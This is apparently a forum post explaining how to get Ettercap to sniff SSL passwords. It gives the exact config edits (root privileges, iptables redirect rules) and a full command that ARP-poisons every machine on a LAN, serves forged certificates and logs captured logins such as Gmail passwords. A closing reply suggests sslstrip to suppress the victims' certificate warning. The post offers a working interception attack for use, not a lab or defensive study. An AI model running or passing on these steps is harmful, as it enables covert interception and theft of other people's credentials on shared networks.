For people with Ettercap/SSL trouble.
I spent a lot of time trying to get ettercap to sniff SSL passwords using ARP poisoning and sending a forged certificate to the victim machine. I saw a lot of posts very similar to my problem on here with out actually finding the solution so I'm posting what I figured out last night.
For me the problem was very simple. ettercap doesn't seem to do port forwarding for the machine that it is running on. Yes, that's what I messed up. I ran ettercap with all the proper arguments and then FTP'd to some place, and saw the password. "Great!" I thought, and then I tried GMail and it was silent, it didn't show anything. This is a sign of SSL not being forwarded or that you did edit /etc/ettercap.conf properly (see bellow).
I didn't realize that to test this I should grab another machine. I thought the machine I was on was fine. A lot of searching and asking in IRC and this didn't come up so I figured it should be posted to here.
Here's exactly what I did for your benefit:
Step 1) Edit /etc/ettercap.conf
Step 1a) Set the following lines to zero instead of 65536
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
Step 1b) Uncomment the following two lines later in the file
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Step 2) Run the following command:
ettercap --text --quiet --iface eth1 --plugin autoadd --log-info mylog --mitm arp:remote // //
Note: You only have to perform step 1 once on a machine, then run the command whenever.
Explaination of arguments:
--text: puts ettercap in text-only, no interactive UI mode
--quiet: supresses output of all the packets being sniffed, limits output to only passwords
--iface eth1: This is the LAN interface you're using eth1 happens to be my wireless card.
--plugin autoadd: Very useful plugin. This will poison machines that connect after you have started the script. If you don't do this, you only poison the machines that are on when you begin, which might be noone.
--log-info mylog: Logs just connection details and passwords. See manpage if you want more logging. This will create a file called log.eci which can be read later with etterlog.
--mitm arp:remote: Tells ettercap to poison the ARP tables so that everyone on the network things that you're the gateway and all communication will go through you.
// //: These are two lists of IP, port ranges to sniff. Read the man page on this for more details. As I have set it up, it will poison and sniff everyone on the network.
Details of what will happen:
After you run the command, anyone on the network visiting an SSL page (that is anything with https rather than http) is going to see a new certificate and get an very non-subtle warning that there's possibly foul play afoot (assuming they have visited the site before and have a valid certificate stored already). If they accept the new certificate and log in, their password will be printed to your console.
Hope this helps,
try sslstrip for the certificate warning
Good friend of the forums